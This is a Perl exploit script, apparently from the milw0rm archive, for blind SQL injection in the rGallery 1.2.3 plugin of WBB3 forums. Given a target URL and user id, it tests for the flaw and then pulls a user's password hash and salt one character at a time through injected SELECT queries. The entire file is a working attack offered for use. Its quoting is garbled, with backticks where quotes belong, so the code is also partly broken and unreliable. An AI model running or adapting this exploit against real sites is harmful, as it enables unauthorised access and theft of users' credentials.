WBB3 rGallery 1.2.3 (UserGallery) Blind SQL Injection Exploit#!/usr/bin/perl -w

use strict;
use LWP::Simple;

$| = 1;

print q {
#############################
## WBB3 Blind SQL-Injector ##
#### Exploit in rGallery ####
###### by Invisibility ######
#############################
\\\    Special greetz to     #
//  Katharsis/**/nobody     #
\\\    Gunner/**/Cheese      #
//          Thx ;)          #
#############################


};

if (@ARGV < 3) {
 print `Usage: wbb3sploit.pl [url] [user id] [User Gallery userID] \nExample: wbb3sploit.pl www.target.com 1 5\n`;
 print `[User Gallery UserID] has to be the ID of a User, who has got pictures.\nExample: www.target.com/index.php?page=RGalleryUserGallery&amp;userID=5\n`;
 exit;
}

my $url = shift;
my $uid  = shift;
my $galid  = shift;

my $prefix;

my @charset = ('a','b','c','d','e','f','1','2','3','4','5','6','7','8','9','0');

print `~ Is it vulnerable?...\n`;

my $chreq = get(`http://`.$url.`/index.php?page=RGalleryUserGallery&amp;userID='`);

if (($chreq =~ m/Fatal error/i) || ($chreq =~ m/Invalid SQL/i)) {

print `Nice, seems to be vulnerable!\n`;

} else {

print `Seems to be patched, sorry\n`;
exit;

}

print `~ Checking Prefix...\n`;

if ($chreq =~ m/_wcf/i) {

 print `~ Found Prefix '$1'\n`;
 $prefix = $1;

} else {
 print `~ Can't find prefix, using 'wcf1_'\n`;
 $prefix = `wcf1_`;
}

print `~ Exploiting...\n`;
print `~^~ Hash: `;

my $counter = 1;
my $countersalt = 1;

while($counter < 41) {

foreach(@charset) {

 my $ascode       = ord($_);
 my $result       = get(`http://`.$url.`/index.php?page=RGalleryUserGallery&amp;userID=`.$galid.`/**/AND/**/ascii(substring((SELECT/**/password/**/FROM/**/`.$prefix.`user/**/WHERE/**/userid=`.$uid.`),`.$counter.`))=`.$ascode.``);

 if (length($result) != 0) {
  if ($result =~ `Keine`) {
  }
  else{
   print chr($ascode);
   $counter++;
   }
  }
 }
}
my $saltcheck = get(`http://`.$url.`/index.php?page=RGalleryUserGallery&amp;userID=`.$galid.`/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/`.$prefix.`user/**/WHERE/**/userid=`.$uid.`),1))>0`);
if($saltcheck =~ `Keine`)
{
}
else
{
print `\n~^~ Salt: `;
while($countersalt < 41) {

foreach(@charset) {

 my $ascodesalt       = ord($_);
 my $resultsalt       = get(`http://`.$url.`/index.php?page=RGalleryUserGallery&amp;userID=`.$galid.`/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/`.$prefix.`user/**/WHERE/**/userid=`.$uid.`),`.$countersalt.`))=`.$ascodesalt.``);

 if (length($resultsalt) != 0) {
  if ($resultsalt =~ `Keine`) {
  }
  else{
   print chr($ascodesalt);
   $countersalt++;
   }
  }
 }
}
}
print `\n~ Done! Exploit by Invisibility\n`;

# milw0rm.com [2009-03-23]